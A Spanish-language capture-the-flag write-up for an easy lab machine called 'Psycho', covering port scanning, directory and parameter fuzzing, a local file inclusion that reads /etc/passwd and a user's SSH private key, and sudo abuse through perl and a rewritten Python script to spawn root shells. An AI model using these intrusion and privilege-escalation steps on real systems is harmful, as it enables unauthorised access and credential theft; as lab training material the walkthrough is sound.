Psycho

✍️ Autor: Luisillo_o🔍 Dificultad: Fácil 📅 Fecha de creación: 10/08/2024

🔍 RECONOCIMIENTO

En primer lugar, tras conectarnos a la máquina, utilizamos el comando:

ping -c 1 172.17.0.2

para verificar la conectividad de red.

A continuación, realizamos el comando:

nmap -sVC -p- -n --min-rate 5000 172.17.0.2

para realizar un escaneo de puertos y servicios detallado en la dirección IP.

Como podemos observar durante el escaneo que el puerto 22 perteneciente al servicio SSH y el puerto 80 perteneciente al servicio HTTP están abiertos por lo que a continuación se indagará más.

🔎 EXPLORACIÓN

Se utiliza el comando:

sudo nmap -sCV -p22,80 -v 172.17.0.2

para obtener más información sobre esos puertos específicamente.

Seguimos indagando más sobre los puertos y ahora indagamos sobre el servicio HTTP. Se ingresó la dirección IP en el navegador lo que llevó a que la página web sea un presentación del CTF.

Ahora buscaremos directorios y archivos con la herramienta Gobuster a través de:

gobuster dir -u http://172.17.0.2/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt

Nos llama la atención el directorio /assets y contiene una imagen pero no es relevante. En el servidor web encontramos el siguiente mensaje: [!] ERROR [!]. Aprovechando este error y el hecho de que contamos con un archivo index.php, decidimos realizar un ataque de fuzzing en busca de un parámetro vulnerable.

wfuzz -c --hw 169 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://172.17.0.2/index.php?FUZZ=/etc/passwd

🚀 EXPLOTACIÓN

Vamos a comprobar si hay un LFI.

http://172.17.0.2/index.php?secret=/etc/passwd

Nos encontramos dos usuarios luisillo y vaxei pero realizando fuerza bruta no tenemos suerte por lo que probamos a coger el id_rsa con vaxei tenemos suerte.

La copiamos en nuestra máquina y le damos permisos.

chmod 600 id_rsa

Nos logueamos.

ssh -i id_rsa vaxei@172.17.0.2

🔐 PRIVILEGIOS

Al estar dentro y ejecutar:

whoami

aún no somos root, por lo que hacemos:

sudo -l

para ver si hay algo para explotar.

Tenemos permisos SUDO con el usuario luisillo con perl revisamos esta página.

sudo -u luisillo /usr/bin/perl -e 'exec "/bin/sh";'

Vemos que permisos SUDO tenemos para escalar.

Borramos el archivo y creamos el mismo archivo pero con este contenido para que establezca una shell.

import os

# Ejecutar bash
os.system("/bin/bash")

Ejecutamos para escalar a root.

sudo -u root /usr/bin/python3 /opt/paw.py

Last updated

Was this helpful?